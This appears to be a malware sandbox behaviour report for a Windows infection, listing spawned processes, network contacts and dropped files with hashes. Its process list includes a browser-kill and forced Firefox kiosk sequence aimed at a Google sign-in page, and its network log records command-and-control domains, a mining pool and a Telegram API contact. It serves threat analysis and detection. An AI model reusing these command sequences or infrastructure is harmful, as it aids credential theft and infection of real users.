C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe

"C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1968 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 26973 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {89434cc4-5c02-4e46-9952-f5b162d41cf7} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" gpu

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2404 -parentBuildID 20240401114208 -prefsHandle 2396 -prefMapHandle 2392 -prefsLen 27893 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcefe755-ed17-4c92-8eba-b3eeafe2e8c9} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2984 -prefMapHandle 2980 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6aee126-02ba-4091-ab76-345d3946e11b} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab

C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe

"C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4092 -childID 2 -isForBrowser -prefsHandle 4084 -prefMapHandle 4080 -prefsLen 32383 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf9c54d7-c2d6-4610-affc-978c87b62edd} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4224 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4884 -prefMapHandle 4880 -prefsLen 32383 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cebe1feb-5ef3-4020-a479-6a52580b6948} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5312 -childID 3 -isForBrowser -prefsHandle 5296 -prefMapHandle 5304 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5accf423-98c0-444c-800e-ed14ca4b0c51} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 4 -isForBrowser -prefsHandle 5424 -prefMapHandle 5324 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc5080e6-9ef4-4303-b2b8-56c721da26ab} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 5 -isForBrowser -prefsHandle 5616 -prefMapHandle 5428 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54817f4f-d0e9-4663-8819-257164c54489} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab

C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"

C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\10107560101\ktxzLhN.exe

"C:\Users\Admin\AppData\Local\Temp\10107560101\ktxzLhN.exe"

C:\Users\Admin\AppData\Local\Temp\dll32.exe

"C:\Users\Admin\AppData\Local\Temp\dll32.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 explorebieology.run udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 172.67.189.66:443 moderzysics.top tcp
DE 192.248.189.11:443 pool.hashvault.pro tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 45.154.98.175:6969 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.96.1:443 exarthynature.run tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.124.170.33:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 api.telegram.org udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:50649 tcp
N/A 127.0.0.1:50658 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
GB 172.217.16.238:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 172.217.16.238:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
GB 216.58.204.68:443 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r2---sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2---sn-aigl6ns6.gvt1.com tcp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2.sn-aigl6ns6.gvt1.com udp

Files

memory/1664-0-0x0000000000B80000-0x0000000000E8F000-memory.dmp

memory/1664-1-0x0000000077774000-0x0000000077776000-memory.dmp

memory/1664-2-0x0000000000B81000-0x0000000000BE1000-memory.dmp

memory/1664-3-0x0000000000B80000-0x0000000000E8F000-memory.dmp

memory/1664-4-0x0000000000B80000-0x0000000000E8F000-memory.dmp

memory/1664-5-0x0000000000B80000-0x0000000000E8F000-memory.dmp

memory/1664-6-0x0000000000B80000-0x0000000000E8F000-memory.dmp

memory/1664-7-0x0000000000B80000-0x0000000000E8F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe

MD5 f42f59d1a7bc1d3fcd51d41a76974175
SHA1 08591f2269d3d8c8099beaa0f4676ae8b0f7bb1c
SHA256 ad14a834ed7d0994d38ec0374f26f4837e94fe5b54d15442c5b2fb796365dc38
SHA512 38c5cc4567b19c637b58874dd408d5994c168f071962d7008889b9e360667301107a9efd7e1ee326e53bddbec5f536d562d91c7170761127f568d3175544eaae

memory/1664-15-0x0000000000B80000-0x0000000000E8F000-memory.dmp

memory/1660-13-0x0000000000090000-0x000000000054D000-memory.dmp

memory/1664-11-0x0000000000B81000-0x0000000000BE1000-memory.dmp

memory/1660-16-0x0000000000091000-0x00000000000BF000-memory.dmp

memory/1660-17-0x0000000000090000-0x000000000054D000-memory.dmp

memory/1660-18-0x0000000000090000-0x000000000054D000-memory.dmp

memory/1660-32-0x0000000000090000-0x000000000054D000-memory.dmp

memory/2668-30-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/2668-33-0x0000000000E11000-0x0000000000E3F000-memory.dmp

memory/2668-34-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/2668-35-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/2668-36-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/2668-37-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/2668-38-0x0000000000E10000-0x00000000012CD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

memory/2668-54-0x0000000000E10000-0x00000000012CD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

memory/5036-56-0x0000029BA6BF0000-0x0000029BA6C12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0t0q1sa0.5gm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2668-66-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/2668-67-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/2668-68-0x0000000000E10000-0x00000000012CD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 de6aa76f93d4b52a199d3c98d970e110
SHA1 04ddc85a8c120fecab8623fe4138a508928d08db
SHA256 ddcd2e80e82a9efc63f8a8bac854e8e4f942c7bd4b49266cf8f4be13883294b2
SHA512 43a0aaf20d756287f0fcb0d00de557b18b1f1127a8feebaf9ccb55218c7dcc484d06494f5015855fcdb72da9b34cb77e2e8792bf57afc2a3cd7eeefa5c6bb74c

C:\Users\Admin\AppData\Local\Temp\installer.ps1

MD5 b6d611af4bea8eaaa639bbf024eb0e2d
SHA1 0b1205546fd80407d85c9bfbed5ff69d00645744
SHA256 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b
SHA512 d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d

\??\c:\Users\Admin\AppData\Local\Temp\5muhcagw\5muhcagw.cmdline

MD5 fae76bd3065d61a21e86cbb920f08bea
SHA1 db6c2c5f13f6a1ba52ff4771865d40d022f8f3d8
SHA256 eb75175c09cb51b0325801a5bbc45c7c38d4f26454b4ff960854f1d9d4b7e6c5
SHA512 3404a386c444a478c86a128fd6487c4a1bd5324d4cb687b79bd4147a0817e8a1c9a0cd17c9eb7b08beaa504a79b8ac4f7cbe6535d907f577cc554365fa2aff65

\??\c:\Users\Admin\AppData\Local\Temp\5muhcagw\5muhcagw.0.cs

MD5 1809fe3ba081f587330273428ec09c9c
SHA1 d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9
SHA256 d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457
SHA512 e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28

\??\c:\Users\Admin\AppData\Local\Temp\5muhcagw\CSCE2143F3F87124EFFBE7090E7EC1FD14.TMP

MD5 d110bbffa2130161b0ab32577d1e6ac8
SHA1 f842eff29345803e4b1a7a6f36a17128145b2d13
SHA256 ca608c743a476787fafbf5c39a4fbdbdcc4befe9fd42286eae80a77a2d6790af
SHA512 66885a480ac808f01691984a90629a7abcba53dce5e2b39adeee039677cd43b4a42173a0f492fbd8e1d7f05489b7c25bd64589c1f20ac35fa8a2a59107487165

C:\Users\Admin\AppData\Local\Temp\RESAB10.tmp

MD5 b4fcaed393b5d224264acb65043cda3b
SHA1 2d5812504ed5b2b079274cbbb082de42f1f11883
SHA256 3c2723d3f6dabecf3bd3d6d4c2592894d9b67dd5f1597173d53e85b8b9ba8202
SHA512 a8ae074e6697cb48583aec7997973628daf2d92892421b2f63304377e7f12a075c90bd1a85921d46751541cc4a2f3197fa64f709172564d31210666f33ac26c9

memory/116-98-0x000001F064340000-0x000001F064348000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5muhcagw\5muhcagw.dll

MD5 5fda57446782824f5c91ee670d8d1358
SHA1 076ec4ce7533a650e70a668a6ba47c8d002cab47
SHA256 6eab8972fcb1cb586a27fca93c94864e98a9a430d65f4a1dc9e0a184d1fa3da7
SHA512 8a00cd8fd3941a349b13838cb9033644f9ca5afe9fd89428a91a7755e94ab8b9bbba08edd22c27c1a867962dbad1ac00ecff0e0f2a07928232c2e5d565d48f50

memory/2996-96-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/3432-100-0x000000000E580000-0x000000000EE03000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe

MD5 35a4dfb5f0308d20b1e5bf26e0a70509
SHA1 0c72b35b74dadbce4a95c034968913de271aae06
SHA256 40d3baeb6df3e2cd4eed207e773b21989b86ef547de12a748529c2b559025339
SHA512 51b8bf5583a256015daaa8caa9c9868c792ef4a1157b89a6880b365c4c5a1c7416abc2b1fcdde9d1d5d9bb7aaa1c617d5b34124a582ec042ac5a2afa064c60d9

memory/2996-126-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/2036-125-0x0000000000700000-0x0000000001614000-memory.dmp

memory/2668-127-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/2036-128-0x000000001C360000-0x000000001CEC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dll32.exe

MD5 ffb5c5f8bab4598fada3bbf92d02d66d
SHA1 ae8096c1f160c97874179ea878a61f69bfb9941a
SHA256 f3aa764be17f1a197f94b949cfd88f99c2d67e9fec1f53046ef1b6189f594da1
SHA512 902e8a95b964ef3a48504dcdb3c4f0615212eb942476ec26b88e02a39cbaaf866f3fcbe5cd4374342b80aae9a7e17092a28dbe1d53630493a0b0cee8152a4ccf

memory/4264-140-0x0000029995B90000-0x0000029995B9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Costura\05A92EC28EDC5561548638CAA951F864\64\sqlite.interop.dll

MD5 65ccd6ecb99899083d43f7c24eb8f869
SHA1 27037a9470cc5ed177c0b6688495f3a51996a023
SHA256 aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512 533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

memory/4264-141-0x0000029997590000-0x0000029997606000-memory.dmp

memory/4264-135-0x00000299951B0000-0x0000029995766000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

memory/2668-167-0x0000000000E10000-0x00000000012CD000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/2256-182-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe

MD5 745e4bcf3d176ea5e82a7c26a6733757
SHA1 499cf0a28c9469faabae1e0f998c6a9b3e82862f
SHA256 8af6936111d0ba881e34ec715d1383dc90c017cd5ca3f51f1d69dc02c0aa2c63
SHA512 bd3fe79f49b060ae01766ca3e424a466c5ca652863a00fd23109e177bc7f6b2856eb513ea18ebbf5c3bee8820f817c50fadda44e12fe79656fbe6bb811aba69d

memory/3236-199-0x0000000000EC0000-0x00000000011C9000-memory.dmp

memory/1940-200-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/1940-201-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/1940-209-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/1940-210-0x0000028DDD7B0000-0x0000028DDD7D0000-memory.dmp

memory/1940-213-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/1940-214-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/1940-215-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/1940-211-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/1940-212-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/4360-233-0x00000000004E0000-0x00000000004F0000-memory.dmp

memory/2668-234-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/1940-235-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/2256-237-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2256-236-0x0000000000400000-0x0000000000840000-memory.dmp

memory/3236-239-0x0000000000EC0000-0x00000000011C9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe

MD5 8a632abe880092fb8fe1d3c882c417a5
SHA1 d3773cc8e6dc6dcd757a5cbc3269b435885fbbf4
SHA256 7f37d73657533b0e599dfac9fb0267c3e38342f1aeb475e3b72421440c95ece7
SHA512 3f9238f924e2cf022bd4d9c9c151b85055cd969561304de47baec945754e4e7b63e00a5ec7cfb2344d9c71c4a75e9a0d7f0c4fa16a0707cef87619240e63c196

C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta

MD5 87a4fdd840e9a650df04bd645b571381
SHA1 9d896ce31ad9643d1a114642f993b1225f553121
SHA256 0b8bf150abca1992a04c8403f1ca8910d4d4a7ccea59cdce48d5913a76f2c618
SHA512 f6064b5fbcb05940d0d02f87a3a2bf2de88a4a1f46dc9aa2c62dc392ea82bf9f139c6bc2a64fab73c08ac0764bbb7413b8e5f5674f4327f2e06c7033e4352500

memory/4624-263-0x0000000004530000-0x0000000004566000-memory.dmp

memory/4624-264-0x0000000004C40000-0x0000000005268000-memory.dmp

memory/4624-265-0x0000000005270000-0x0000000005292000-memory.dmp

memory/4624-267-0x00000000054F0000-0x0000000005556000-memory.dmp

memory/4624-266-0x0000000005410000-0x0000000005476000-memory.dmp

memory/4624-277-0x0000000005560000-0x00000000058B4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 212ec0c97c5a5624609ffac0e67191f2
SHA1 646b82fa58e01a7dee9c21628a2f059facfee60a
SHA256 137682dd769077c7e6ab64d7da1a397ef4521cc2310887e0b5fc9c63856fea6b
SHA512 590c33bcffc8924d31311422a0dbc5aaefa821d7382d524c7ee2e0a92c9663d2259d0008218103305dd38657e6bf29ec6bf146c241d32be20daea53f6edaff6d

